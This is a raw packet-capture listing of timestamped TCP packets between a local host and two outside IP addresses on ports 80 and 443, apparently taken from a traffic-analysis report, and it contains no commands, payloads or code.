                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.996020079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.996862888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.996921062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.004220009 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.004298925 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.004368067 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.004581928 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.004581928 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.004621983 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.004650116 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.008141041 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.008164883 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.008222103 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.008552074 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.008567095 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.121232986 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.121337891 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.121412992 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.121658087 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.121686935 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.121701956 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.121709108 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.125185966 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.125212908 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.125339031 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.125464916 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.125482082 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.151257992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.151344061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.151361942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.151444912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.151762962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.151827097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.151890993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.151946068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.152918100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.152981997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.153027058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.153079987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.154119968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.154177904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.154236078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.154289961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.155098915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.155153990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.155159950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.155210972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.156120062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.156173944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.156207085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.156256914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.157308102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.157368898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.157419920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.157465935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.158307076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.158360958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.158401012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.158446074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.159503937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.159562111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.159631014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.159684896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.160486937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.160542965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.160609007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.160660982 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.161596060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.161648035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.161686897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.161736012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.162661076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.162709951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.162811041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.162872076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.163744926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.163795948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.163835049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.163881063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.164833069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.164891005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.164930105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.164979935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.165905952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.165966034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.166013956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.166070938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.167018890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.167093039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.167133093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.167182922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.168108940 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.168163061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.168201923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.168250084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.169188976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.169249058 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.169301033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.169352055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.170279026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.170332909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.170372963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.170425892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.171431065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.171483994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.171516895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.171566963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.172446012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.172498941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.172554016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.172599077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.173567057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.173621893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.173691034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.173744917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.174727917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.174782991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.174865961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.174916983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.175726891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.175806046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.175838947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.175890923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.176824093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.176894903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.176956892 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.177011013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.177916050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.177974939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.178003073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.178051949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.178996086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.179084063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.179106951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.179173946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.180071115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.180138111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.180179119 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.180233955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.181166887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.181226969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.181265116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.181314945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.182265997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.182327986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.182406902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.182468891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.183342934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.183464050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.183481932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.183531046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.184464931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.184520006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.184547901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.184595108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.185537100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.185611010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.185645103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.185697079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.186636925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.186697960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.186768055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.186820984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.187967062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.188045979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.188045979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.188097954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.188807011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.188873053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.188913107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.188960075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.189881086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.189954042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.189963102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.190017939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.190983057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.191046000 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.191083908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.191137075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.192231894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.192302942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.192313910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.192370892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.193245888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.193306923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.193352938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.193408966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.194240093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.194303989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.194336891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.194413900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.195344925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.195410967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.195436954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.195488930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.196423054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.196479082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.196567059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.196620941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.197549105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.197608948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.197649002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.197705984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.198590994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.198647976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.198745012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.198818922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.199755907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.199820995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.199829102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.199878931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.200756073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.200826883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.200840950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.200890064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.201864004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.201934099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.201976061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.202029943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.202948093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.203011036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.203058004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.203109026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.204142094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.204205990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.204328060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.204385042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.205276966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.205328941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.205368042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.205415964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.206207991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.206264019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.206310034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.206361055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.207309008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.207366943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.207405090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.207468033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.208343983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.208398104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.361637115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.361671925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.361721039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.361756086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.361836910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.361887932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.361926079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.361973047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.362937927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.363025904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.363056898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.363101006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.364007950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.364068031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.364113092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.364159107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.365118980 CET804977031.41.244.11192.168.2.4
